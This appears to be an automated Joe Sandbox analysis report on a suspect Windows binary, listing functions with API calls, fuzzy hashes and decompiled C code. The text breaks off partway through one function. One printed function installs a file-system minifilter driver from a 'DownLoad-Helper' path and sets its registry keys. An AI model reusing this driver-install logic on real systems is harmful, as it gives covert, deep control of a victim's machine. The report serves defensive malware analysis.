Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8289615cb0840f380a70e217726c3fc9d8de8554005407560ec9664e0b8755f2
Instruction ID: 2f02f835a1e4874909ac086d902e9038e3e892104a7af1d9f6aca1d86fe99df6
Opcode Fuzzy Hash: 8289615cb0840f380a70e217726c3fc9d8de8554005407560ec9664e0b8755f2
Instruction Fuzzy Hash: 88E03731501A1AE6EB253A65BC0477E3E48DB417B4B1FC111EF59A619ADB90CC0049F1

Uniqueness

Uniqueness Score: -1.00%

Function 00CADAB2 Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00CADAB9

Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00E86E80,00000001,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7), ref: 00CB7DFA
Part of subcall function 00CB7DC9: InitializeCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E10
Part of subcall function 00CB7DC9: LeaveCriticalSection.KERNEL32(00E86E80,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E1E
Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E2B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 62a2a51bdb69dacd50874a66022e03229738ab598781f1f13d28c5f852d1304c
Instruction ID: b385acba2ffdd8c4b0b49842a498cd9cc28bf7ae5d0d311bad43ca3af4d84e35
Opcode Fuzzy Hash: 62a2a51bdb69dacd50874a66022e03229738ab598781f1f13d28c5f852d1304c
Instruction Fuzzy Hash: D2E01A7450820BDFDB50AFB0C90679D7771BF51721F204125F4A25A2D0CFB08E91EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00CACF54 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CACF5B

Part of subcall function 00CAD897: LocalAlloc.KERNEL32(00000040,8007000E,?,00CAA54B,00000104,00000004,00E680A0,00E56C20,?,?,?,00E56BC0,00CA60A7,?,00CA20E2), ref: 00CAD89F

Part of subcall function 00CACB3F: __EH_prolog3_catch.LIBCMT ref: 00CACB46

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal
String ID:
API String ID: 1948148156-0
Opcode ID: a98c97680681d57c26fa54b73c54b8237fad791b8d7150b692eac03435e5e9ab
Instruction ID: a2ba2f0ae992526d048a4a800838284df7ed2701307925f075d0ee9c761168db
Opcode Fuzzy Hash: a98c97680681d57c26fa54b73c54b8237fad791b8d7150b692eac03435e5e9ab
Instruction Fuzzy Hash: 2EE0C230A0122247DB5076F0094376CB592AB41F08F000205E5817B3C2CBB40E4187E2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8E35 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000029,?,?,00000000), ref: 00CD8E55

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 5d165f7b1f84413990aea5d8668bac62654e167f8314eb2eb9914fb01b6419dd
Instruction ID: efc7debdfd285ebd0a1b760c7689917fe3b589c2f52c453412dc62920766e567
Opcode Fuzzy Hash: 5d165f7b1f84413990aea5d8668bac62654e167f8314eb2eb9914fb01b6419dd
Instruction Fuzzy Hash: CED05270204204EFE3049B45CC09BB27369EB92B01F00802DA3194F790CAB1A808CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7A0F Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 00CA7A30

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 067802f569437be065e0dfe6a0db0d20d8e13761f2d3a39f2e6c635d465a0514
Instruction ID: 52a958f3f852700b9641583fb59ee730765378880db1d771aa88940a2eb6100a
Opcode Fuzzy Hash: 067802f569437be065e0dfe6a0db0d20d8e13761f2d3a39f2e6c635d465a0514
Instruction Fuzzy Hash: 55D0A770694209BEF7009F10CC0AEA977ACDB01B05F2042347642EA1D1D6F26D1C9650

Uniqueness

Uniqueness Score: -1.00%

Function 00CB9CCD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CB9CDC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: 7a6b11513f91a0d718f06c9083d203213204bc1863103865bd273acc9aa40c24
Instruction ID: 962ddb38d784946d974c60eb64eab3017388a0ee607812e60713840c9c1be679
Opcode Fuzzy Hash: 7a6b11513f91a0d718f06c9083d203213204bc1863103865bd273acc9aa40c24
Instruction Fuzzy Hash: 59B012B0906114BECF406F32DA0C79F7AA4EF41307F00CC94F544D1051DB79C085D900

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CA8C59 Relevance: 49.3, APIs: 18, Strings: 10, Instructions: 287
registryserviceCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CA8C59(char* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				char* _t54;
				void* _t60;
				void _t64;
				void _t65;
				intOrPtr _t68;
				char _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				void _t81;
				void _t82;
				intOrPtr _t85;
				char _t86;
				void _t87;
				intOrPtr _t90;
				char _t95;
				intOrPtr _t96;
				char* _t108;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				char* _t122;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t128;
				signed int _t134;
				int _t139;
				intOrPtr* _t140;
				void* _t143;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t152;
				void* _t158;
				void* _t160;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t179;
				void* _t183;
				void* _t185;
				void* _t187;
				signed int _t188;

				_t142 = __edx;
				_t52 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t52 ^ _t188;
				_t108 = __ecx;
				if(__ecx == 0 || __edx == 0) {
					L4:
					_t54 = 0;
					goto L5;
				} else {
					_t180 = 0;
					GetFullPathNameA(__edx, 0x104,  &_v528, 0);
					_t147 = OpenSCManagerA(0, 0, 0xf003f);
					_push(0);
					if(_t147 != 0) {
						_t60 = CreateServiceA(_t147, _t108, _t108, 0xf01ff, 2, 3, 0,  &_v528, "FSFilter Activity Monitor", 0, "FltMgr", 0, ??);
						if(_t60 != 0) {
							CloseServiceHandle(_t60);
							CloseServiceHandle(_t147);
							_t114 = 8;
							memcpy( &_v268, "SYSTEM\\CurrentControlSet\\Services\\", _t114 << 2);
							_t143 = _t108;
							asm("movsw");
							asm("movsb");
							_t183 = _t143;
							do {
								_t64 =  *_t143;
								_t143 = _t143 + 1;
							} while (_t64 != 0);
							_t142 = _t143 - _t183;
							_t152 =  &_v268 - 1;
							do {
								_t65 =  *(_t152 + 1);
								_t152 = _t152 + 1;
							} while (_t65 != 0);
							_t117 = _t142 >> 2;
							memcpy(_t152, _t183, _t117 << 2);
							memcpy(_t183 + _t117 + _t117, _t183, _t142 & 0x00000003);
							_t158 =  &_v268 - 1;
							do {
								_t68 =  *((intOrPtr*)(_t158 + 1));
								_t158 = _t158 + 1;
							} while (_t68 != 0);
							_t180 = "\\Instances";
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							if(RegCreateKeyExA(0x80000002,  &_v268, 0, 0xe4bcbb, 1, 0xf003f, 0,  &_v532,  &_v536) != 0) {
								goto L4;
							}
							_t122 = _t108;
							_t145 =  &_v268 - _t108;
							do {
								_t73 =  *_t122;
								 *((char*)(_t145 + _t122)) = _t73;
								_t122 =  &(_t122[1]);
							} while (_t73 != 0);
							_t160 =  &_v268 - 1;
							do {
								_t74 =  *((intOrPtr*)(_t160 + 1));
								_t160 = _t160 + 1;
							} while (_t74 != 0);
							_t180 = " Instance";
							_t123 =  &_v268;
							_t142 = _t123 + 1;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							do {
								_t75 =  *_t123;
								_t123 = _t123 + 1;
							} while (_t75 != 0);
							if(RegSetValueExA(_v532, "DefaultInstance", 0, 1,  &_v268, _t123 - _t142) != 0) {
								goto L4;
							}
							RegFlushKey(_v532);
							RegCloseKey(_v532);
							_t125 = 8;
							memcpy( &_v268, "SYSTEM\\CurrentControlSet\\Services\\", _t125 << 2);
							_t146 = _t108;
							asm("movsw");
							asm("movsb");
							_t185 = _t146;
							do {
								_t81 =  *_t146;
								_t146 = _t146 + 1;
							} while (_t81 != 0);
							_t142 = _t146 - _t185;
							_t165 =  &_v268 - 1;
							do {
								_t82 =  *(_t165 + 1);
								_t165 = _t165 + 1;
							} while (_t82 != 0);
							_t128 = _t142 >> 2;
							memcpy(_t165, _t185, _t128 << 2);
							memcpy(_t185 + _t128 + _t128, _t185, _t142 & 0x00000003);
							_t171 =  &_v268 - 1;
							do {
								_t85 =  *((intOrPtr*)(_t171 + 1));
								_t171 = _t171 + 1;
							} while (_t85 != 0);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t187 = _t108;
							do {
								_t86 =  *_t108;
								_t108 =  &(_t108[1]);
							} while (_t86 != 0);
							_t109 = _t108 - _t187;
							_t173 =  &_v268 - 1;
							do {
								_t87 =  *(_t173 + 1);
								_t173 = _t173 + 1;
							} while (_t87 != 0);
							_t134 = _t109 >> 2;
							memcpy(_t173, _t187, _t134 << 2);
							memcpy(_t187 + _t134 + _t134, _t187, _t109 & 0x00000003);
							_t179 =  &_v268 - 1;
							do {
								_t90 =  *((intOrPtr*)(_t179 + 1));
								_t179 = _t179 + 1;
							} while (_t90 != 0);
							_t108 = 0;
							_t180 = " Instance";
							asm("movsd");
							asm("movsd");
							asm("movsw");
							if(RegCreateKeyExA(0x80000002,  &_v268, 0, 0xe4bcbb, 1, 0xf003f, 0,  &_v532,  &_v536) != 0) {
								goto L4;
							}
							_t139 = 0;
							do {
								_t40 = _t139 + "370030"; // 0x30303733
								_t95 =  *_t40;
								 *((char*)(_t188 + _t139 - 0x108)) = _t95;
								_t139 = _t139 + 1;
							} while (_t95 != 0);
							_t140 =  &_v268;
							_t142 = _t140 + 1;
							do {
								_t96 =  *_t140;
								_t140 = _t140 + 1;
							} while (_t96 != 0);
							_t180 = RegSetValueExA;
							if(RegSetValueExA(_v532, "Altitude", 0, 1,  &_v268, _t140 - _t142) != 0) {
								goto L4;
							}
							_v536 = 0;
							if(RegSetValueExA(_v532, ?str?, 0, 4,  &_v536, 4) != 0) {
								goto L4;
							}
							RegFlushKey(_v532);
							RegCloseKey(_v532);
							_t54 = 1;
							L5:
							return E00DDCBCE(_t54, _t108, _v8 ^ _t188, _t142, _t147, _t180);
						}
						if(GetLastError() != 0x431) {
							_t108 = 0;
						} else {
							_t108 = 1;
						}
						_t180 = CloseServiceHandle;
						CloseServiceHandle(CloseServiceHandle);
						CloseServiceHandle(_t147);
						_t54 = _t108;
						goto L5;
					}
					CloseServiceHandle();
					goto L4;
				}
			}

0x00ca8c59
0x00ca8c62
0x00ca8c69
0x00ca8c6d
0x00ca8c73
0x00ca8ca9
0x00ca8ca9
0x00000000
0x00ca8c79
0x00ca8c79
0x00ca8c89
0x00ca8c9c
0x00ca8c9e
0x00ca8ca1
0x00ca8cda
0x00ca8ce2
0x00ca8d0f
0x00ca8d12
0x00ca8d16
0x00ca8d22
0x00ca8d24
0x00ca8d26
0x00ca8d28
0x00ca8d29
0x00ca8d2b
0x00ca8d2b
0x00ca8d2d
0x00ca8d2e
0x00ca8d38
0x00ca8d3a
0x00ca8d3b
0x00ca8d3b
0x00ca8d3e
0x00ca8d3f
0x00ca8d45
0x00ca8d48
0x00ca8d4f
0x00ca8d57
0x00ca8d58
0x00ca8d58
0x00ca8d5b
0x00ca8d5c
0x00ca8d66
0x00ca8d75
0x00ca8d88
0x00ca8d91
0x00ca8d93
0x00ca8d9c
0x00000000
0x00000000
0x00ca8da8
0x00ca8daa
0x00ca8dac
0x00ca8dac
0x00ca8dae
0x00ca8db1
0x00ca8db2
0x00ca8dbc
0x00ca8dbd
0x00ca8dbd
0x00ca8dc0
0x00ca8dc1
0x00ca8dc5
0x00ca8dca
0x00ca8dd0
0x00ca8dd3
0x00ca8dd4
0x00ca8dd5
0x00ca8dd7
0x00ca8dd7
0x00ca8dd9
0x00ca8dda
0x00ca8dff
0x00000000
0x00000000
0x00ca8e0b
0x00ca8e17
0x00ca8e1f
0x00ca8e2b
0x00ca8e2d
0x00ca8e2f
0x00ca8e31
0x00ca8e32
0x00ca8e34
0x00ca8e34
0x00ca8e36
0x00ca8e37
0x00ca8e41
0x00ca8e43
0x00ca8e44
0x00ca8e44
0x00ca8e47
0x00ca8e48
0x00ca8e4e
0x00ca8e51
0x00ca8e58
0x00ca8e60
0x00ca8e61
0x00ca8e61
0x00ca8e64
0x00ca8e65
0x00ca8e6e
0x00ca8e6f
0x00ca8e70
0x00ca8e71
0x00ca8e73
0x00ca8e73
0x00ca8e75
0x00ca8e76
0x00ca8e80
0x00ca8e82
0x00ca8e83
0x00ca8e83
0x00ca8e86
0x00ca8e87
0x00ca8e8d
0x00ca8e90
0x00ca8e97
0x00ca8e9f
0x00ca8ea0
0x00ca8ea0
0x00ca8ea3
0x00ca8ea4
0x00ca8eae
0x00ca8eb7
0x00ca8ec5
0x00ca8ed3
0x00ca8ed9
0x00ca8ee3
0x00000000
0x00000000
0x00ca8ee9
0x00ca8eeb
0x00ca8eeb
0x00ca8eeb
0x00ca8ef1
0x00ca8ef8
0x00ca8ef9
0x00ca8efd
0x00ca8f03
0x00ca8f06
0x00ca8f06
0x00ca8f08
0x00ca8f09
0x00ca8f0d
0x00ca8f2f
0x00000000
0x00000000
0x00ca8f3d
0x00ca8f56
0x00000000
0x00000000
0x00ca8f62
0x00ca8f6e
0x00ca8f76
0x00ca8cab
0x00ca8cb9
0x00ca8cb9
0x00ca8cef
0x00ca8cf6
0x00ca8cf1
0x00ca8cf3
0x00ca8cf3
0x00ca8cf9
0x00ca8cff
0x00ca8d02
0x00ca8d04
0x00000000
0x00ca8d04
0x00ca8ca3
0x00000000
0x00ca8ca3

APIs

GetFullPathNameA.KERNEL32(?,00000104,?,00000000,?,C:\DownLoad-Helper\x64_FsFilter.dat,00000000), ref: 00CA8C89
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00CA8C96
CloseServiceHandle.ADVAPI32(00000000), ref: 00CA8CA3
CreateServiceA.ADVAPI32(00000000,00000000,00000000,000F01FF,00000002,00000003,00000000,?,FSFilter Activity Monitor,00000000,FltMgr,00000000,00000000), ref: 00CA8CDA
GetLastError.KERNEL32 ref: 00CA8CE4
CloseServiceHandle.ADVAPI32(00000000), ref: 00CA8CFF
CloseServiceHandle.ADVAPI32(00000000), ref: 00CA8D02
CloseServiceHandle.ADVAPI32(00000000), ref: 00CA8D0F
CloseServiceHandle.ADVAPI32(00000000), ref: 00CA8D12
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00E4BCBB,00000001,000F003F,00000000,?,?), ref: 00CA8D94
RegSetValueExA.ADVAPI32(?,DefaultInstance,00000000,00000001,?,?), ref: 00CA8DF7
RegFlushKey.ADVAPI32(?), ref: 00CA8E0B
RegCloseKey.ADVAPI32(?), ref: 00CA8E17
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00E4BCBB,00000001,000F003F,00000000,?,?), ref: 00CA8EDB
RegSetValueExA.ADVAPI32(?,Altitude,00000000,00000001,?,?), ref: 00CA8F2B
RegSetValueExA.ADVAPI32(?,Flags,00000000,00000004,?,00000004), ref: 00CA8F52
RegFlushKey.ADVAPI32(?), ref: 00CA8F62
RegCloseKey.ADVAPI32(?), ref: 00CA8F6E

Strings

Instance, xrefs: 00CA8DC5, 00CA8EB7
\Instances\, xrefs: 00CA8E69
\Instances, xrefs: 00CA8D66
SYSTEM\CurrentControlSet\Services\, xrefs: 00CA8D17, 00CA8E20
Altitude, xrefs: 00CA8F20
Flags, xrefs: 00CA8F47
DefaultInstance, xrefs: 00CA8DEC
FltMgr, xrefs: 00CA8CBB
C:\DownLoad-Helper\x64_FsFilter.dat, xrefs: 00CA8C6F
FSFilter Activity Monitor, xrefs: 00CA8CC1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Close$Service$Handle$CreateValue$Flush$ErrorFullLastManagerNameOpenPath
String ID: Instance$Altitude$C:\DownLoad-Helper\x64_FsFilter.dat$DefaultInstance$FSFilter Activity Monitor$Flags$FltMgr$SYSTEM\CurrentControlSet\Services\$\Instances$\Instances\
API String ID: 3460324579-4087092792
Opcode ID: fee416f50acc02afb78ea620c8da8fb4dcf95201ca2ce1d92c2d5081537e2711
Instruction ID: 96ff26a21829537ec8a266d552a7a41e011b2056f02276c945f561caabb4b2b2
Opcode Fuzzy Hash: fee416f50acc02afb78ea620c8da8fb4dcf95201ca2ce1d92c2d5081537e2711
Instruction Fuzzy Hash: EC91383160421A9FDF258E259C44FFABB7AEF66B48F0040E4E59577141CEB15E8E8B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CD313E Relevance: 39.1, APIs: 21, Strings: 1, Instructions: 566
windowstringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E00CD313E(void* __ebx, void* __ecx, void* __edi, int _a4, signed int _a8) {
				struct tagPOINT _v0;
				int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				struct HMENU__* _v28;
				long _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				struct HMENU__* _v56;
				signed int _v60;
				signed int _v64;
				int _v68;
				void* _v72;
				signed int _v100;
				int _v128;
				void* _v132;
				char _v272;
				char _v532;
				signed int _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				long _v808;
				long _v812;
				long _v816;
				long _v820;
				long _v824;
				char _v828;
				signed int _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				long _v1104;
				long _v1108;
				long _v1112;
				long _v1116;
				long _v1120;
				char _v1124;
				struct _SHFILEINFOA _v1476;
				struct _SHFILEINFOA _v1828;
				signed int _v1860;
				intOrPtr _v1980;
				void* __esi;
				void* __ebp;
				void* _t177;
				int _t179;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed int _t197;
				signed int _t206;
				signed int _t208;
				intOrPtr* _t209;
				signed int _t214;
				signed int _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				int _t241;
				signed int _t251;
				signed int _t254;
				signed int _t258;
				signed int _t265;
				signed int _t268;
				signed int _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t276;
				signed int _t279;
				intOrPtr _t280;
				intOrPtr _t281;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				int _t298;
				int _t299;
				struct HMENU__* _t300;
				int _t301;
				void* _t302;
				intOrPtr* _t304;
				signed int _t305;
				signed int _t309;
				intOrPtr* _t310;
				signed int _t313;
				intOrPtr* _t315;
				signed int _t319;
				intOrPtr* _t322;
				intOrPtr* _t323;
				intOrPtr* _t324;
				signed int _t325;
				signed int _t329;
				int _t330;
				intOrPtr* _t332;
				intOrPtr _t336;
				intOrPtr _t337;
				intOrPtr* _t339;
				int _t340;
				signed int _t341;
				intOrPtr* _t345;
				intOrPtr* _t347;
				void* _t348;
				signed int _t349;
				void* _t350;
				void* _t352;
				void* _t353;
				int _t355;
				intOrPtr* _t356;
				void* _t358;
				intOrPtr* _t359;
				signed int _t362;
				intOrPtr* _t368;
				signed int _t369;
				intOrPtr* _t370;
				void* _t371;
				signed int _t373;
				void* _t375;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t383;

				_push(__ebx);
				_t296 = __ecx;
				_t304 = 0;
				_push(_t352);
				_push(__edi);
				_t345 = _a4;
				 *((intOrPtr*)(__ecx + 0x158)) = 0;
				if(_t345 == 0) {
					L4:
					_t177 = _t296 + 0x154;
					__imp__SHGetDesktopFolder(_t177);
					_t353 = _t177;
					_t179 = 1;
					__eflags = 1;
					goto L5;
				} else {
					_t339 =  *_t345;
					if(_t339 == 0) {
						goto L4;
					} else {
						if( *((intOrPtr*)(_t345 + 8)) == 0) {
							E00CAA4E7(__ecx, 0, _t345, _t352, __eflags);
							asm("int3");
							_t379 = _t382;
							_t383 = _t382 - 0x71c;
							_t183 =  *0xe68dd4; // 0x8d2643c2
							_v24 = _t183 ^ _t379;
							_t340 = _v12;
							_push(__ecx);
							_t298 = _v8;
							_push(_t352);
							_push(_t345);
							__eflags = _t340;
							if(__eflags == 0) {
								L46:
								E00CAA4E7(_t298, _t304, _t345, _t352, __eflags);
								asm("int3");
								_push(_t379);
								_t380 = _t383;
								_t186 =  *0xe68dd4; // 0x8d2643c2
								_v1860 = _t186 ^ _t380;
								_t188 =  *0xe885c8; // 0x0
								_push(_t352);
								_t355 = 0;
								_push(_t345);
								_t347 = _t304;
								__eflags =  *(_t188 + 4);
								if(__eflags == 0) {
									L97:
									E00CAA4E7(_t298, _t304, _t347, _t355, __eflags);
									asm("int3");
									_push(_t380);
									_push(_t355);
									_t356 = _t304;
									_t190 = E00D23B0A(_t298, _t304, __eflags, _v1980);
									__eflags = _t190 - 0xffffffff;
									if(_t190 == 0xffffffff) {
										L100:
										_t191 = _t190 | 0xffffffff;
										__eflags = _t191;
									} else {
										_t190 = E00CD3059(_t356, _t340);
										__eflags = _t190;
										if(_t190 == 0) {
											goto L100;
										} else {
											_t191 = 0;
										}
									}
									return _t191;
								} else {
									__eflags =  *0xe870c8 - _t355; // 0x0
									if(__eflags != 0) {
										L96:
										_pop(_t348);
										__eflags = _v16 ^ _t380;
										_pop(_t358);
										return E00DDCBCE(_t188, _t298, _v16 ^ _t380, _t340, _t348, _t358);
									} else {
										__eflags =  *(_t347 + 0x164);
										if(__eflags != 0) {
											__eflags =  *(_t347 + 0x154);
											if( *(_t347 + 0x154) == 0) {
												goto L96;
											} else {
												_push(_t298);
												_t188 = SendMessageA( *(_t347 + 0x20), 0x1032, 0, 0);
												_t340 = _v0.x;
												_t298 = _t298 | 0xffffffff;
												_t309 = _a4;
												_v60 = _t188;
												_v56 = _t298;
												__eflags = _t340 - _t298;
												if(_t340 != _t298) {
													L58:
													_v40 = _t340;
													_v36 = _t309;
													ScreenToClient( *(_t347 + 0x20),  &_v40);
													_v32 = 1;
													_t188 = SendMessageA( *(_t347 + 0x20), 0x1012, _t355,  &_v40);
													__eflags = _v32 & 0x0000000e;
													if((_v32 & 0x0000000e) == 0) {
														goto L95;
													} else {
														_v56 = _v28;
														goto L60;
													}
												} else {
													__eflags = _t309 - _t298;
													if(_t309 != _t298) {
														goto L58;
													} else {
														__eflags = _t188;
														if(_t188 == 0) {
															L95:
															_pop(_t298);
															goto L96;
														} else {
															_t330 = _t298;
															_t373 = _t188;
															do {
																_t330 = SendMessageA( *(_t347 + 0x20), 0x100c, _t330, 2);
																_t340 = _t330;
																_t373 = _t373 - 1;
																__eflags = _t373;
															} while (_t373 != 0);
															_v32 = _t373;
															_v28 = _t373;
															_v24 = _t373;
															_v20 = _t373;
															_t258 = E00CD762C(_t347, _t340,  &_v32, _t373);
															__eflags = _t258;
															if(_t258 != 0) {
																_v0.x = _v32;
																_a4 = _v20 + 1;
																ClientToScreen( *(_t347 + 0x20),  &_v0);
															}
															L60:
															_t197 =  *0xe885c8; // 0x0
															_t310 =  *((intOrPtr*)(_t197 + 4));
															_t359 =  *((intOrPtr*)( *_t310 + 0xc));
															_t304 = _t359;
